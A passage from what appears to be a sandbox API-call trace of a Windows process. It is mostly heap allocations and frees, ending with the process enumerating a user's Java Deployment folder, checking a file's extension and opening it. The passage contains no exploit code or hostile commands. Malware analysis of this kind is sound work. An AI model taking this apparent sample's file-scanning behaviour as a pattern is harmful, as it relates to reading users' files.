(HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0242.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0242.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0242.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0242.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0242.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0242.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0242.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0242.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0242.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0242.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0242.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0242.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0242.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0242.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0242.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0242.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0242.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0242.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0242.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0242.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0242.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0242.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0242.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0242.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0242.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0242.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0242.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0242.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0242.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0242.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0242.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0242.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0242.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0242.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0242.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0242.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0242.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0242.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0242.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0242.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0242.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0242.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0242.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0242.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0242.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0242.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0242.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0242.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0242.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0242.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0242.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0242.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0242.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0242.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0242.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0242.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0242.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0242.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0242.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0242.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0242.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0242.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0242.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0242.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0242.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0242.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0242.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0242.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0242.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.241] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\") returned="Deployment\\" [0242.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0242.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a220 [0242.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.241] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0242.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c44b0 [0242.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a220 | out: hHeap=0x620000) returned 1 [0242.241] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0242.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d188 [0242.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c44b0 | out: hHeap=0x620000) returned 1 [0242.241] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0242.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c5148 [0242.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d188 | out: hHeap=0x620000) returned 1 [0242.241] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0242.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8fb68 [0242.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0242.242] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0242.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0242.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0242.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0242.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8fb68 | out: hHeap=0x620000) returned 1 [0242.242] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0242.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0242.242] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0242.242] PathFindFileNameW (pszPath="") returned="" [0242.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.242] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1ea6db0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1ea6db0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0242.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.243] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1ea6db0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1ea6db0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0242.243] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa1ea6db0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1ea6db0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xfec5c570, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x2cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="deployment.properties", cAlternateFileName="DEPLOY~1.PRO")) returned 1 [0242.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0242.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd6) returned 0x708b30 [0242.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0242.244] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties") returned=".properties" [0242.244] CreateFileW 